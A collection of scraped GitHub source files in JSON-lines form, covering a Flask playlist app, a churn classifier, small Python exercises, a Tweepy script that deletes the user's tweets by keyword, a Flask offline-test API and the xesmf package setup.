current_user.liked_playlists.remove(playlist.uuid)\n current_user.save()\n playlist.likes = playlist.likes - 1\n playlist.save()\n return redirect(url_for('playlists.view', uuid=playlist.uuid))\n else:\n current_user.liked_playlists.append(playlist.uuid)\n current_user.save()\n playlist.likes += 1\n playlist.save()\n return redirect(url_for('playlists.view', uuid=playlist.uuid))\n \n@playlists.route('/about', methods=['GET', 'POST'])\ndef about():\n return render_template('about.html', title=\"About\")","repo_name":"unrealJune/388JFinal","sub_path":"flask_app/playlists/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74842057470","text":"import pandas as pd\nimport numpy as np\nfrom collections import Counter \nimport matplotlib.pyplot as plt\nimport datetime as dt\nfrom sklearn import preprocessing\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.compose import make_column_transformer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.metrics import accuracy_score, confusion_matrix, precision_score, recall_score, roc_auc_score, roc_curve, f1_score\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.utils import resample\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.linear_model import LogisticRegression\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import metrics\n\n\n\npath='/Users/dulinna/LDProjects/pickingstock/RobinHood_Test'\nstart = dt.date(2016,8, 16)\nend = dt.date(2017,8, 17)\nequity_value_data = pd.read_csv(path +\"/equity_value_data.csv\")\nfeatures_data = pd.read_csv(path +\"/features_data.csv\")\n\nprint('(a) The percentage of Users have churned in the data provided')\n# parse the time step to find the date \nequity_value_data['date'] = equity_value_data['timestamp'].apply (lambda x : x.split('T')[0])\nequity_value_data.drop(columns = ['timestamp'], inplace = True)\nequity_value_groupby = equity_value_data.groupby(['user_id'])\n'''\ncalculate the gap between the data collection data and the last date the user is acctive\nAsume that when the user acount is not in the dataset, the user is churned\nalso calculate the equity volatilty, portfolio changes for each user during the time period\n'''\nall = pd.DataFrame(columns = ['user_id','fist_day', 'last_day', 'days_gap', 'close_equity', 'first_last_day_changes_pct', 'equity_volatility'])\nfor k, v in equity_value_groupby:\n v.sort_values(by = ['date'])\n firstday = min(v['date'])\n y,m,d = max(v['date']).split('-')\n lastday = dt.date(int(y), int(m), int(d))\n gap = (end - lastday).days\n ininital_euity = v[v.date == min(v['date']) ]['close_equity'].values[0]\n close_equity = v[v.date == max(v['date']) ]['close_equity'].values[0]\n equity_changes_pct = (close_equity - ininital_euity)%ininital_euity\n vol = np.std( np.log(v['close_equity']/v['close_equity'].shift(-1)) )*252**0.5\n all = (all.append({'user_id': k,'fist_day': firstday, 'last_day':lastday, 'close_equity':close_equity, 'days_gap': gap,\n 'first_last_day_changes_pct':equity_changes_pct, 'equity_volatility': vol },\n ignore_index = True)) \naa = all\nchurn = all[all.days_gap >= 28]\nno_churn = all[all.days_gap < 28]\nprint(\"the churn rate in % is\")\nchurnedrate = len(churn)/len(all) * 100\nprint(churnedrate)\n\nprint('b) build a classifer')\n\ndata = all.merge(features_data, how = 'left', on ='user_id')\ndata['acount_changes'] = (data.close_equity - data.first_deposit_amount)/data.first_deposit_amount * 100\ndata['Churn_or_not'] = [1 if i >= 28 else 0 for i in data['days_gap']]\ndata.replace([np.inf, -np.inf], np.nan, inplace=True)\ndata.dropna(inplace = True)\n\ny = data['Churn_or_not']\nreduced = ['liquidity_needs', 'instrument_type_first_traded', 'platform', 'time_horizon']\ndata.drop(columns = ['user_id', 'fist_day', 'last_day', 'days_gap', 'close_equity', 'Churn_or_not'], inplace = True)\nX = data\ncategorical_data = ['risk_tolerance','investment_experience', 'liquidity_needs', 'instrument_type_first_traded', 'platform', 'time_horizon']\nnumerical_data = ['time_spent','acount_changes', 'equity_volatility', 'first_last_day_changes_pct', 'first_deposit_amount']\n\n# deal with categorial data\ncol_trans = make_column_transformer(\n (OneHotEncoder(),categorical_data),\n remainder = \"passthrough\"\n )\n\n\n\n\nrf_classifier = RandomForestClassifier()\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, train_size=0.8, random_state=50, shuffle=True, stratify=None)\nX_train = X_train.fillna('na')\nX_test = X_test.fillna('na')\n\n## upscale sampling\nX_train_y = X_train\nX_train_y['y'] = y_train\nminority = X_train_y[X_train_y.y ==1]\nmajority = X_train_y[X_train_y.y ==0]\nminority_upsampled = resample(minority,\n replace = True,\n n_samples = majority.shape[0],\n random_state = 123)\ndf_upsampled = pd.concat([minority_upsampled, majority])\ny_train = df_upsampled['y']\nX_train = df_upsampled.drop(columns = ['y'])\n\n# train with logistic regression\n\nlogistic_classifier = LogisticRegression()\npipe_logit = make_pipeline(col_trans, logistic_classifier)\npipe_logit.fit(X_train, y_train)\ny_pred_logist = pipe_logit.predict(x_test)\nscore = pipe_logit.score(X_test, y_test)\nprint(score)\n'''\n#train model with simple RF\n#\nseed = 50\nrf_classifier = RandomForestClassifier(\n min_samples_leaf=50,\n n_estimators=150,\n bootstrap=True,\n oob_score=True,\n n_jobs=-1,\n random_state=seed,\n max_features='auto')\npipe = make_pipeline(col_trans, rf_classifier)\npipe.fit(X_train, y_train)\n\n\n# grid search and cross validation\nfrom sklearn.model_selection import GridSearchCV\nparam_grid = {'n_estimators': [int(x) for x in np.linspace(start = 100, stop = 300, num = 50)],\n 'max_features': ['auto', 'log2'],\n 'max_depth': [3, 5],\n 'min_samples_split': [2, 5, 10],\n 'min_samples_leaf': [1, 4, 10],\n 'max_leaf_nodes': [None] + list(np.linspace(10, 50, 100).astype(int)),\n 'bootstrap': [True, False], \n 'n_jobs': [-1]\n \n }\nrf_tune = RandomForestClassifier(oob_score=True, n_jobs = -1)\nrandom_rf = RandomizedSearchCV(\n estimator = rf_tune,\n param_distributions = param_grid,\n verbose = 2,\n random_state=seed,\n cv=3,\n scoring='roc_auc')\n\npipe_random = make_pipeline(col_trans, random_rf)\npipe_random.fit(X_train, y_train)\n# cross validation\nrandom_rf.best_params_\nbest_model = random_rf.best_estimator_\npipe_best_model = make_pipeline(col_trans, best_model)\npipe_best_model.fit(X_train, y_train)\ny_pred_best_model = pipe_best_model.predict(X_test)\ntrain_rf_predictions = pipe_best_model.predict(X_train)\ntrain_rf_probs = pipe_best_model.predict_proba(X_train)[:, 1]\nrf_probs = pipe_best_model.predict_proba(X_test)[:, 1]\naccuracy_score(y_test, y_pred)\nprint(f\"The accuracy of the model is {round(accuracy_score(y_test,y_pred_best_model ),3)*100} %\")\nprint(f'Train ROC AUC Score: {roc_auc_score(y_train, train_rf_probs)}')\nprint(f'Test ROC AUC Score: {roc_auc_score(y_test, rf_probs)}')\n\n\n'''\ny_pred = pipe.predict(X_test)\n\n\n\n\n'''https://towardsdatascience.com/my-random-forest-classifier-cheat-sheet-in-python-fedb84f8cf4f'''\n","repo_name":"linnadu/MachineLearning-","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13781635437","text":"import constants\r\nimport string\r\n\r\n\r\ndef main():\r\n print(\"BASKETBALL TEAM STATS TOOL\")\r\n balance_teams()\r\n main_menu()\r\n\r\n\r\ndef main_menu():\r\n while True:\r\n menu_options = [\"1\", \"Q\"]\r\n print(\"\\n\\n<<< MAIN MENU >>>\\n\\n\")\r\n print(\"Select an option below:\\n\")\r\n print(\" 1) Display Team Stats\")\r\n print(\" Q) Quit\")\r\n print(\"\")\r\n menu_selection = input(\"Enter an option >> \").upper()\r\n if menu_selection not in menu_options:\r\n print(\"Invalid selection, try again.\")\r\n continue\r\n else:\r\n menu_choice(menu_selection)\r\n\r\n\r\ndef menu_choice(selection):\r\n if selection == \"1\":\r\n team_selection_menu()\r\n if selection == \"Q\":\r\n print(\"Exiting application...\")\r\n quit()\r\n\r\n\r\ndef team_selection_menu():\r\n while True:\r\n menu_options = {}\r\n selected_team = {}\r\n options = [str(x) for x in list(range(1, 101))]\r\n print(\"\")\r\n print(\"Select a team to view:\")\r\n print(\"\")\r\n for index, team in enumerate(rosters):\r\n menu_options[options[index]] = team\r\n print(\"{}) {}\".format(options[index], team))\r\n print(\"\")\r\n print(\"{}) {}\".format(\"M\", \"Main Menu\"))\r\n print(\"{}) {}\".format(\"Q\", \"Quit\"))\r\n\r\n print(\"\")\r\n menu_selection = input(\"Enter an option >> \").upper()\r\n if menu_selection == \"M\":\r\n main_menu()\r\n break\r\n if menu_selection == \"Q\":\r\n print(\"Exiting application...\")\r\n quit()\r\n if menu_selection not in menu_options:\r\n print(\"Invalid selection, try again.\")\r\n continue\r\n else:\r\n selected_team[menu_options[menu_selection]] = rosters[menu_options[menu_selection]]\r\n display_team(selected_team)\r\n input(\"Press ENTER to continue...\")\r\n continue\r\n\r\n\r\ndef balance_teams():\r\n teams = load_teams_data()\r\n players = load_players_data()\r\n players_per_team = (len(players) // len(teams))\r\n experienced_players = [d for d in players if d['experience']]\r\n inexperienced_players = [d for d in players if not d['experience']]\r\n\r\n for team in teams:\r\n temp_players = []\r\n while len(temp_players) < players_per_team:\r\n temp_players.append(experienced_players.pop())\r\n temp_players.append(inexperienced_players.pop())\r\n rosters[team] = temp_players\r\n return rosters\r\n\r\n\r\ndef display_team(team):\r\n team_name = list(team.keys())[0]\r\n players = \", \".join([player[\"name\"] for player in team[team_name]])\r\n guardians = \", \".join([x for l in [player[\"guardians\"] for player in team[team_name]] for x in l])\r\n avg_height = round(\r\n sum([player[\"height\"] for player in team[team_name]]) / len([player[\"name\"] for player in team[team_name]]), 2)\r\n experienced_count = sum([player[\"experience\"] for player in team[team_name]])\r\n inexperienced_count = len(team[team_name]) - experienced_count\r\n print(\"\")\r\n header = f\"Team: {team_name} Stats\"\r\n print(header)\r\n print(\"-\" * len(header))\r\n print(\"Total players: {}\".format(len(team[team_name])))\r\n print(\"Total experienced: {}\".format(experienced_count))\r\n print(\"Total inexperienced: {}\".format(inexperienced_count))\r\n print(\"Average height: {}\".format(avg_height))\r\n print(\"\")\r\n print(\"Players on Team:\")\r\n print(\" {}\".format(players))\r\n print(\"\")\r\n print(\"Guardians:\")\r\n print(\" {}\".format(guardians))\r\n print(\"\")\r\n\r\n\r\ndef load_teams_data():\r\n teams = []\r\n teams = constants.get_teams()\r\n return teams\r\n\r\n\r\ndef load_players_data():\r\n players = []\r\n players = constants.get_players()\r\n cleaned_players = clean_players(players)\r\n return cleaned_players\r\n\r\n\r\ndef clean_players(data):\r\n cleaned = []\r\n for player in data:\r\n fixed = {\"name\": player[\"name\"], \"guardians\": player[\"guardians\"].split(\" and \")}\r\n if player[\"experience\"] == \"YES\":\r\n fixed[\"experience\"] = True\r\n else:\r\n fixed[\"experience\"] = False\r\n fixed[\"height\"] = int(player[\"height\"].split(\" \")[0])\r\n cleaned.append(fixed)\r\n return cleaned\r\n\r\n\r\nif __name__ == \"__main__\":\r\n rosters = {}\r\n main()\r\n","repo_name":"pjregis/teamtreehouse-python-project2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32423859982","text":"#定义一个用于存放学员信息的列表变量\nstulist=[\n {'name':'zhangxiaogang','age':20,'classid':'pyton01'},\n {'name':'wanppeng','age':26,'classid':'pyton02'},\n {'name':'lixia','age':19,'classid':'pyton08'}]\n\n#定义一个学生信息的输出函数\ndef showstu(stulist):\n ...\n '学员信息的输出函数'\n ...\n\n if len(stulist)==0:\n print('=========== 没有学员信息可以输出!===========')\n return\n print('|{0:<10}| {1:<20}| {2:<20}| {3:<20}|'.format('sid','name','age','classid'))\n print('-' *40)\n for i in range(len(stulist)):\n print('|{0:<10}| {1:<20}| {2:<20}| {3:<20}|'.format(i+1,stulist[i]['name'],stulist[i]['age'],stulist[i]['classid']))\n\nwhile True:\n # 输出初始界面\n print('=' *12,'学员管理系统','=' *14)\n print('{0:1} {1:13} {2:15}'.format(' ', '1. 查看学员信息','2.添加学员信息'))\n print('{0:1} {1:13} {2:15}'.format(' ', '3. 删除学员信息','4.退出系统'))\n print('='*40)\n key = input('请输入对应读选择:')\n # 根据键盘值,判断并执行对应的操作\n if key == '1':\n print('=' *12,'学员信息浏览','='*14)\n showstu(stulist)\n input('按回车继续:')\n\n elif key == '2':\n print('=' *12,'学员信息添加','='*14)\n stu={}\n stu['name']=input('请输入要添加的姓名:')\n stu['age'] = input('请输入要添加的年龄:')\n stu['classid'] = input('请输入要添加的班级号:')\n stulist.append(stu)\n showstu(stulist)\n input('按回车继续:')\n\n elif key == '3':\n print('=' *12,'学员信息删除','='*14)\n showstu(stulist)\n sid = input('请删除你要删除的信息ID号:')\n del stulist[int(sid)-1]\n input('按回车继续:')\n elif key == '4':\n print('=' *12,'再见','='*14)\n break\n else:\n print('=========无效的键盘输入!==========')","repo_name":"jasoncheung1/untitled","sub_path":"学员信息在线管理.py","file_name":"学员信息在线管理.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36779776989","text":"import base64\nimport sys\n\nimport requests\n\nfrom jinja2 import Template\nfrom panoptes_client import Project\n\n\nproject = Project.find(slug=sys.argv[-1])\n\nposter_info = {\n 'image_name': '{}-poster.svg'.format(project.slug.replace('/','-')),\n 'avatar_b64': base64.b64encode(\n requests.get(project.avatar['media'][0]['src']).content\n ),\n 'avatar_type': project.avatar['media'][0]['content_type'],\n}\n\nposter_info.update(project.raw)\n\nwith open('template.svg') as template_f:\n template = Template(template_f.read())\n\nwith open(poster_info['image_name'], 'w') as out_f:\n out_f.write(template.render(**poster_info))\n","repo_name":"zooniverse/project-poster-generator","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24206189907","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndim1 = 20\ndim2 = 20\n\nstrategies = np.load(\"results/grid_strategies.npz\")\n\nfc = list()\n\nfor i in range(len(strategies['g1'])):\n fc.append(np.mean(strategies['g1'][i]))\n\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\n\nax.plot(fc)\nplt.show()","repo_name":"jmiszczak/evolving-games","sub_path":"models/prosocial/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"1332455387","text":"import tweepy, json\n\n# Authenticate to Twitter\nauth = tweepy.OAuthHandler(\"REDACTED\", \"REDACTED\")\nauth.set_access_token(\"REDACTED\", \"REDACTED\")\n\napi = tweepy.API(auth)\n'''\n# To test access to Twitter\ntry:\n\tapi.verify_credentials()\n\tprint(\"Authentication OK\")\nexcept tweepy.TweepError as error:\n\tprint(\"Error during authentication\")\n\tprint(error.reason)\napi.update_status(\"test tweet\")\n'''\n\n# Counters for fun and data\ndeleted_tweets = 0\nfailed_deletion = 0\nunaffected_tweets = 0\n\nfile = open(\"tweet.js\",\"r\")\nmyjson = json.load(file)\n# print(repr(myjson)) # to confirm that json file is read in as a list\n\ntext_substr = 'the ' # keyword. need to have a space after it to prevent things like \"they\" bc it's a string. case-sensitive.\n\ndef tweet_matches(tweet, full_text_substr):\n\ttweet = tweet['tweet'] # parse individual tweet dictionary as a list\n\tfull_text_matches = full_text_substr in tweet ['full_text'] # search full-text key:value for substring\n\treturn full_text_matches\n\nqualifying_tweets = [t for t in myjson if tweet_matches(t, text_substr)]\n\n#print(*qualifying_tweets, sep=\"\\n\") # this will print entire dicts for each matching tweet\n\nfor tweet in qualifying_tweets:\n\tfull_text = tweet.get(\"tweet\").get(\"full_text\")\n\tcreated_at = tweet.get(\"tweet\").get(\"created_at\")\n\tin_reply_to_screen_name = tweet.get(\"tweet\").get(\"in_reply_to_screen_name\",\"[none]\") # not all tweets are replies\n\t#print(f\"{full_text}\" + ' created at' + f\"{created_at}\")\n\n\tprint(full_text + ' created at' + created_at + ' will be deleted')\n\ttry:\n\t\t#print(f\"{full_text}\" + ' created at' + f\"{created_at}\")\n\t\tapi.destroy_status(tweet['tweet']['id_str'])\n\texcept (tweepy.error.TweepError):\n\t\tprint('Error destroying due to ', tweepy.error.TweepError)\n\t\tfailed_deletion +=1\n\ttry:\n\t\t#print(f\"{full_text}\" + ' created at' + f\"{created_at}\")\n\t\tapi.get_status(tweet[\"tweet\"][\"id_str\"])\n\texcept (tweepy.error.TweepError):\n\t\tprint(f\"{full_text}\" + ' created at' + f\"{created_at}\"+ ' ' + tweet[\"tweet\"][\"id_str\"] + ' successfully deleted')\n\t\tdeleted_tweets +=1\n\telse:\n\t\tfailed_deletion +=1\n\nunaffected_tweets = len(myjson) - len(qualifying_tweets)\n\nprint('Total deleted tweets = ', deleted_tweets)\nprint('Total failed deletion = ', failed_deletion)\nprint('Total unaffected tweets = ', unaffected_tweets)\n","repo_name":"gobborg/delete-tweets-by-keyword","sub_path":"keyword.py","file_name":"keyword.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34595739249","text":"import sys\n\nfrom pyomo.environ import SolverFactory\nfrom mpisppy.utils.pysp_model import PySPModel\nfrom mpisppy.opt.ph import PH\n\ndef _print_usage():\n print('Usage: \"farmer_pysp.py solver\" where solver is a pyomo solver name')\nif len(sys.argv) < 2:\n _print_usage()\n sys.exit()\ntry:\n solver_avail = SolverFactory(sys.argv[1]).available()\n if not solver_avail:\n print(f\"Cannot find solver {sys.argv[1]}\")\n sys.exit()\nexcept:\n print(f\"Cannot find solver {sys.argv[1]}\")\n _print_usage()\n sys.exit()\n\nfarmer = PySPModel(scenario_creator='./PySP/concrete/ReferenceModel.py',\n tree_model='./PySP/ScenarioStructure.dat')\n\nphoptions = {'defaultPHrho': 1.0,\n 'solvername':sys.argv[1],\n 'PHIterLimit': 50,\n 'convthresh': 0.01,\n 'verbose': False,\n 'display_progress': True,\n 'display_timing': False,\n 'iter0_solver_options': None,\n 'iterk_solver_options': None\n }\n\nph = PH( PHoptions = phoptions,\n all_scenario_names = farmer.all_scenario_names,\n scenario_creator = farmer.scenario_creator,\n scenario_denouement = farmer.scenario_denouement,\n )\n\nph.ph_main()\n","repo_name":"GuillaumeGoujard/mpi-sppy","sub_path":"mpisppy/examples/farmer/farmer_pysp.py","file_name":"farmer_pysp.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31579859193","text":"price = 50\npaid = 0\ntpaid = 0\nbalance = price - tpaid\n\nwhile paid < price:\n paid = int(input(\"Insert Coin: \"))\n if paid in [5,10,25]:\n tpaid = tpaid + paid\n balance = price - tpaid\n if balance > 0:\n print (f\"Amount Due: {balance}\")\n else:\n balance = -(balance)\n print (f\"Change Owed: {balance}\")\n break\n else:\n print (f\"Amount Due: {balance}\")\n","repo_name":"naveenclgit/edurekapgops","sub_path":"CS50P/coke/coke.py","file_name":"coke.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8572485405","text":"\n\nfrom datetime import datetime\nfrom flask_restplus import Resource, reqparse, fields, Namespace\n\nfrom dateutil.parser import parse as datetime_parser\nfrom werkzeug.datastructures import FileStorage\n\nfrom chanakya.src import db, app\nfrom chanakya.src.models import Student, QuestionAttempts, QuestionSet\n\nfrom chanakya.src.helpers.response_objects import question_set\nfrom chanakya.src.helpers.file_uploader import upload_file_to_s3, FileStorageArgument\nfrom chanakya.src.helpers.task_helpers import render_pdf_phantomjs, get_attempts, get_dataframe_from_csv\nfrom chanakya.src.helpers.validators import check_csv\n\napi = Namespace('offline_test', description='Handle complete offline test of students')\n\n\n@api.route('/offline_paper')\nclass OfflinePaperList(Resource):\n post_payload_model = api.model('POST_offline_paper', {\n 'number_sets':fields.Integer(required=True),\n 'partner_name':fields.String(required=True)\n })\n\n offline_paper_response = api.model('offline_paper_response', {\n 'error': fields.Boolean(default=False),\n 'data':fields.List(fields.Nested(question_set))\n })\n\n @api.marshal_with(offline_paper_response)\n @api.expect(post_payload_model)\n def post(self):\n args = api.payload\n\n number_sets = args.get('number_sets')\n partner_name = args.get('partner_name')\n\n set_list = []\n\n for i in range(number_sets):\n try:\n # generate the random sets and get question\n set_name = chr(ord('A') + i)\n set_instance, questions = QuestionSet.create_new_set(partner_name, set_name)\n # render pdf\n question_pdf = render_pdf_phantomjs('question_pdf.bkp.html', set_instance=set_instance, questions=questions)\n answer_pdf = render_pdf_phantomjs('answer_pdf.html', set_instance=set_instance, questions=questions)\n\n #s3 method that upload the binary file\n question_pdf_s3_url = upload_file_to_s3(bucket_name = app.config['S3_QUESTION_IMAGES_BUCKET'], string=question_pdf, filename_extension='pdf')\n answer_pdf_s3_url = upload_file_to_s3(bucket_name = app.config['S3_QUESTION_IMAGES_BUCKET'], string=answer_pdf, filename_extension='pdf')\n\n print(question_pdf_s3_url)\n print(answer_pdf_s3_url)\n\n # # update url of question_set\n set_instance.question_pdf_url = question_pdf_s3_url\n set_instance.answer_pdf_url = answer_pdf_s3_url\n db.session.add(set_instance)\n db.session.commit()\n\n set_list.append(set_instance)\n except Exception as e:\n raise e\n\n print(set_list)\n # return each and every question_set\n return {\n 'data': set_list\n }\n\n @api.marshal_with(offline_paper_response)\n def get(self):\n\n set_instance = QuestionSet.query.filter(QuestionSet.partner_name != None).all()\n if set_instance:\n return {\n 'data': set_instance\n }\n return{\n 'error':True,\n 'message':'No set generated for any partner till yet.'\n }\n\n@api.route('/offline_paper/')\nclass OfflinePaper(Resource):\n\n get_response = api.model('GET_offline_paper_id_response', {\n 'error': fields.Boolean(default=False),\n 'data': fields.Nested(question_set),\n 'message':fields.String,\n })\n\n @api.marshal_with(get_response)\n def get(self, id):\n\n set_instance = QuestionSet.query.filter_by(id=id).first()\n if set_instance:\n return {\n 'data': set_instance\n }\n\n return {\n 'message':\"Set doesn't exist\",\n 'error':True\n }\n\n@api.route('/offline_paper/upload_results')\nclass OfflineCSVUpload(Resource):\n\tpost_parser = reqparse.RequestParser(argument_class=FileStorageArgument)\n\tpost_parser.add_argument('partner_csv', required=True, type=FileStorage, location='files')\n\n\t@api.doc(parser=post_parser)\n\tdef post(self):\n\t\targs = self.post_parser.parse_args()\n\t\tcsv = args.get('partner_csv')\n\n\t\t# check image file extension\n\t\textension = csv.filename.rsplit('.', 1)[1].lower()\n\t\tif '.' in csv.filename and not extension == 'csv':\n\t\t\tabort(400, message=\"File extension is not one of our supported types.\")\n\n\t\t# upload to s3\n\t\tcsv_url = upload_file_to_s3(bucket_name=app.config['S3_QUESTION_IMAGES_BUCKET'], file=csv)\n\n\t\treturn {'csv_url': csv_url}\n\n\n@api.route('/offline_paper/compute_results')\nclass OfflineCSVProcessing(Resource):\n invalid_offline_attempts = api.model('invalid_offline_attempts',{\n 'student_row': fields.Integer,\n 'invalid_mcq_question_numbers': fields.List(fields.Integer),\n 'message': fields.String\n })\n post_payload_model = api.model('POST_add_results', {\n 'csv_url': fields.String\n })\n\n post_response = api.model('POST_add_results_response', {\n 'error':fields.Boolean(default=False),\n 'success':fields.Boolean(default=False),\n 'invalid_rows': fields.List(fields.Nested(invalid_offline_attempts)),\n 'record_added': fields.Integer\n })\n\n @api.marshal_with(post_response)\n @api.expect(post_payload_model, validate=True)\n def post(self):\n args = api.payload\n\n # creating a dataframe of the csv_url\n student_rows = get_dataframe_from_csv(args.get('csv_url'))\n\n # CSV Validation\n invalid_rows = check_csv(student_rows)\n if invalid_rows:\n return {\n 'error':True,\n 'invalid_rows': invalid_rows,\n }\n\n record_added_to_chanakya = 0\n\n # Adding each student from CSV DataFrame to chanakya\n for row in student_rows:\n student_data = {}\n stage = 'ETA'\n\n student_data['name'] = row.get('Name')\n student_data['gender'] = app.config['GENDER'](row.get('Gender').upper())\n student_data['dob'] = datetime_parser(row.get('Date of Birth'))\n student_data['religion'] = app.config['RELIGION'](row.get('Religion'))\n student_data['caste'] = app.config['CASTE'](row.get('Caste'))\n\n main_contact = row.get('Main Contact')\n alternative_contact = row.get('Alternative Contact')\n\n set_id = int(row.get('Set ID'))\n set_instance = QuestionSet.query.get(set_id)\n\n # creating the student, student_contact and an enrollment_key for the student with set_id\n student, enrollment = Student.offline_student_record(stage, student_data, main_contact, alternative_contact, set_instance)\n attempts = get_attempts(row, enrollment) # this get all the attempts made by student\n QuestionAttempts.create_attempts(attempts, enrollment) #storing the attempts to the database\n enrollment.calculate_test_score() #calculating the score of the student\n\n record_added_to_chanakya += 1\n\n return {\n 'success':True,\n 'record_added': record_added_to_chanakya\n }\n","repo_name":"amarkrsinha1997/MCQ-Testing-Platform","sub_path":"src/routes/offline_test.py","file_name":"offline_test.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4248506777","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 12 14:38:48 2018\n\n@author: haiau\n\"\"\"\n\nimport Mesh.FEMMesh as FM\nimport InOut.FEMOutput as FO\nimport Mesh.FEMNode as FN\nimport numpy as np\nimport pylab as pl\nimport matplotlib.ticker as ticker\n\nfldrn = '/media/haiau/Data/PyFEM_Results/result_linear_ndiv_'\n\nNdof = 2\ntOrder = 2\n\nndiv = [1,2,4,8]\nres = []\n\nfor n in ndiv:\n filen = fldrn + str(n)+'.dat'\n print('reading data file: '+filen)\n res100,_ = FO.StandardFileOutput.readOutput(filen,val='x')\n resx = res100.tolist()\n nodes = []\n for x in resx:\n nodes.append(FN.Node(x,Ndof,timeOrder=tOrder))\n _,inode = FM.findNodeNearX(nodes,np.array([0.015,-0.1,0.0]))\n testout,tout = FO.StandardFileOutput.readOutput(filen,timeStep='all',node=inode,val='u')\n rest = [t[0][0] for t in testout]\n res.append(np.array(rest))\n \nerr = [] \n \nfor i,n in enumerate(ndiv[0:-1]):\n err.append(np.linalg.norm(res[i+1]-res[i])/np.linalg.norm(res[i+1]))\n \n#pl.plot(ndiv[0:-1],err) \npl.plot(ndiv,np.array(res)[:,200],'-x')\npl.gca().yaxis.set_major_formatter(ticker.FormatStrFormatter('%0.2e')) \n#testres,t = FO.StandardFileOutput.readOutput(filen,list(range(100)),val='u')\n\n\n","repo_name":"haiaubui/PyFEM","sub_path":"Tests/test_post_processing_1.py","file_name":"test_post_processing_1.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"60"} +{"seq_id":"9750950198","text":"# You have been given two sets containing BIT courses. Use the\n# following hints to display the expected output:\n#\n# - Use the set method which returns the difference of two or more\n# sets as a new set\n# - Use the set method which returns the union of sets as a new set\n\ncourses_one = {'Intro App Dev Concepts', 'Programming 2',\n 'Studio 1', 'Sys Admin'}\ncourses_two = {'Int App Dev Concepts', 'Mobile App Dev',\n 'Studio 1', 'Sys Admin'}\n\n# Write your solution here\n\n# Expected output:\n# {'Intro App Dev Concepts', 'Programming 2'}\n# {'Sys Admin', 'Programming 2', 'Intro App Dev Concepts', 'Mobile App Dev', 'Studio 1', 'Int App Dev Concepts'}\n","repo_name":"tclark/op-intermediate-app-dev","sub_path":"03-data-types/practical-03/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"29570049742","text":"import os\n\nfrom setuptools import find_packages, setup\n\nDISTNAME = 'xesmf'\nDESCRIPTION = 'Universal Regridder for Geospatial Data'\nAUTHOR = 'Jiawei Zhuang'\nAUTHOR_EMAIL = 'jiaweizhuang@g.harvard.edu'\nURL = 'https://github.com/pangeo-data/xESMF'\nLICENSE = 'MIT'\nPYTHON_REQUIRES = '>=3.6'\nUSE_SCM_VERSION = {\n 'write_to': 'xesmf/_version.py',\n 'write_to_template': '__version__ = \"{version}\"',\n 'tag_regex': r'^(?Pv)?(?P[^\\+]+)(?P.*)?$',\n}\n\n# https://github.com/rtfd/readthedocs.org/issues/5512#issuecomment-475024373\non_rtd = os.environ.get('READTHEDOCS') == 'True'\nif on_rtd:\n INSTALL_REQUIRES = []\nelse:\n INSTALL_REQUIRES = [\n 'esmpy>=8.0.0',\n 'xarray>=0.16.2',\n 'numpy>=1.16',\n 'shapely',\n 'cf-xarray>=0.5.1',\n 'sparse>=0.8.0',\n 'numba',\n ]\n\nCLASSIFIERS = [\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Intended Audience :: Science/Research',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Topic :: Scientific/Engineering',\n]\n\n\ndef readme():\n with open('README.rst') as f:\n return f.read()\n\n\nsetup(\n name=DISTNAME,\n license=LICENSE,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n classifiers=CLASSIFIERS,\n description=DESCRIPTION,\n long_description=readme(),\n long_description_content_type='text/x-rst',\n python_requires=PYTHON_REQUIRES,\n install_requires=INSTALL_REQUIRES,\n url=URL,\n packages=find_packages(),\n 